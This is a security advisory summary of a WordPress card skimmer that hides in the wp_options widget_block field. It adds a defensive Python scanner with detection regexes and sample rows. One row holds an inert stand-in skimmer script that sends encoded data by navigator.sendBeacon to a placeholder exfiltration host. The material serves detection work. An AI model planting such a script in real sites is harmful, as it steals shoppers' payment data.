WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables

Summary:
A recent investigation has revealed a highly sophisticated credit card skimmer malware targeting WordPress websites. Rather than writing itself into theme or plugin files, the malware injects malicious JavaScript into database entries, which lets it evade common file-scanning tools. Specifically, the malicious code is stored in the WordPress database in the wp_options table, within the widget_block field, as obfuscated JavaScript. Because it lives in the database, the malware remains persistent and hidden from conventional security measures. It targets checkout pages, either by hijacking existing payment fields or by injecting a fake credit card form that mimics legitimate payment processors, tricking users into entering sensitive payment details.

The malware is programmed to activate only when the page URL contains “checkout” and does not contain “cart”, so that it captures payment information at the most critical stage. It dynamically creates a fake payment form that collects credit card numbers, CVV codes, expiration dates, billing addresses, and other personal details. If a legitimate payment form is already present, the malware instead captures the information entered into those fields in real time. To make the stolen data appear innocuous, it applies Base64 encoding and AES-CBC encryption before transmitting it to attacker-controlled servers via the navigator.sendBeacon function, so the data is exfiltrated silently without interrupting the user experience. Domains associated with the malware have been blocklisted.

Security Officer Comments:
This skimmer is particularly dangerous because it operates covertly, stealing payment information without altering the checkout process or alerting users. Attackers can use the stolen data for fraudulent transactions or sell it on underground markets, posing a severe financial risk to victims.

Suggested Corrections:
  • Regular Updates: Outdated software is a primary target for attackers who exploit vulnerabilities in old plugins and themes. Avoid this by consistently updating your site and applying the latest security patches. Alternatively, deploy a Web Application Firewall (WAF) for virtual patching.
  • Admin Account Management: Weak admin passwords are a gateway for attackers. Utilize two-factor authentication and regularly review all admin accounts to ensure their validity. Update passwords frequently, making sure to use strong, unique passwords to bolster security.
  • File Integrity Monitoring: Implement file integrity monitoring to detect unauthorized changes to your website files. It serves as an early warning system that enables rapid response to potential threats.
  • Web Application Firewall: A website firewall can effectively block malicious traffic and prevent hacking attempts from reaching your server.
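Because this skimmer lives in the wp_options table rather than on disk, file integrity monitoring alone will not see it; the database itself has to be checked. The following is an added defensive example, not code from the Sucuri report or from WordPress: it scores exported widget_* rows against the traits described in the summary (an inline script, a checkout URL check, navigator.sendBeacon, encode/decode primitives, long Base64-like blobs). The indicator weights, the threshold, the php_serialize_block helper and all sample rows are constructed for this example.

```python
import re

# Indicator patterns derived from the behaviour described above; weights are constructed for this example.
INDICATORS = [
    (re.compile(r"<script\b", re.I), "inline <script> in block widget", 1),
    (re.compile(r"navigator\.sendBeacon"), "navigator.sendBeacon call", 3),
    (re.compile(r"checkout", re.I), "reference to checkout URL", 2),
    (re.compile(r"\b(atob|btoa|eval|unescape|String\.fromCharCode)\s*\("),
     "encode/decode/eval primitive", 2),
    (re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"), "long base64-like blob", 2),
]
THRESHOLD = 4  # one weak indicator alone (e.g. a benign Custom HTML script tag) must not alert

def score_option(value):
    """Return (score, reasons) for one raw option_value string."""
    score, reasons = 0, []
    for pattern, reason, weight in INDICATORS:
        if pattern.search(value):
            score += weight
            reasons.append(reason)
    return score, reasons

def scan_wp_options(rows):
    """Scan (option_id, option_name, option_value) rows, e.g. from SELECT option_id, option_name,
    option_value FROM wp_options WHERE option_name LIKE 'widget_%' (table prefix may differ)."""
    hits = []
    for option_id, name, value in rows:
        if name.startswith("widget_"):  # block widgets are stored in widget_* rows
            score, reasons = score_option(value)
            if score >= THRESHOLD:
                hits.append((option_id, name, score, reasons))
    return hits

def php_serialize_block(content, index=2):
    """Wrap block content the way WordPress serializes a widget_block entry (ASCII content only)."""
    return 'a:2:{i:%d;a:1:{s:7:"content";s:%d:"%s";}s:12:"_multiwidget";i:1;}' % (
        index, len(content), content)

# Constructed sample rows: a benign paragraph widget, a Custom HTML block with a plain analytics tag,
# an inert stand-in for the injected skimmer (placeholder URL, undefined variable), and an unrelated option.
SAMPLE_ROWS = [
    (101, "widget_block", php_serialize_block(
        "<!-- wp:paragraph --><p>Hello world</p><!-- /wp:paragraph -->")),
    (102, "widget_block", php_serialize_block(
        '<!-- wp:html --><script async src="https://example.invalid/tag.js"></script><!-- /wp:html -->', 3)),
    (103, "widget_block", php_serialize_block(
        '<!-- wp:html --><script>var u=location.href;if(u.indexOf("checkout")>-1&&u.indexOf("cart")<0)'
        '{navigator.sendBeacon("https://EXFIL-PLACEHOLDER.invalid/c",btoa(d))}</script><!-- /wp:html -->', 4)),
    (104, "siteurl", "https://example.invalid"),
]
```

Running scan_wp_options(SAMPLE_ROWS) flags only row 103 (score 8); the analytics tag in row 102 scores 1 and stays below the threshold. Any hit should be reviewed by hand, since legitimate Custom HTML widgets can contain scripts.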
Link(s):
https://blog.sucuri.net/2025/01/ste...ss-checkout-pages-via-database-injection.html